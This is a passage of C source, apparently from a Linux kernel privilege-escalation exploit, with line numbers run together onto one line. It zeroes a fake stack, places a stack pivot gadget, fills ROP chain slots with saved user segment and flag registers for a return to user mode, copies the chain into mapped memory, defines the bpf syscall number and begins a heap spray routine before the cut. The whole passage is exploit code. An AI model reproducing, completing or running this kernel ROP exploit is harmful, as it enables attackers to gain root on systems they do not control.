long*)(krop_base_to_map+0x6000) = 0; 110 | *(unsigned long*)(krop_base_to_map+0x7000) = 0; 111 | *(unsigned long*)(fakestack+0x4000) = 0; 112 | *(unsigned long*)(fakestack+0x3000) = 0; 113 | *(unsigned long*)(fakestack+0x2000) = 0; 114 | *(unsigned long*)(fakestack+0x1000) = 0; 115 | *(unsigned long*)(fakestack) = 0; 116 | *(unsigned long*)(fakestack+0x10) = stack_pivot_gadget; 117 | *(unsigned long*)(fakestack+0x7000) = 0; 118 | *(unsigned long*)(fakestack+0x6000) = 0; 119 | *(unsigned long*)(fakestack+0x5000) = 0; 120 | rop_chain[12+2]=user_cs; 121 | rop_chain[13+2]=user_rflags; 122 | rop_chain[14+2]=(unsigned long)(fakestack + 0x6000); 123 | rop_chain[15+2]=user_ss; 124 | memcpy(krop_base_mapped+rop_start,rop_chain,sizeof(rop_chain)); 125 | puts("rop_payload_initialized"); 126 | } 127 | 128 | #ifndef __NR_bpf 129 | #define __NR_bpf 321 130 | #endif 131 | 132 | uint64_t r[1] = {0xffffffffffffffff}; 133 | 134 | long victim[SPRAY_NUMBER]; 135 | void spray(){ 136 | int i; 137 | for(i=0;i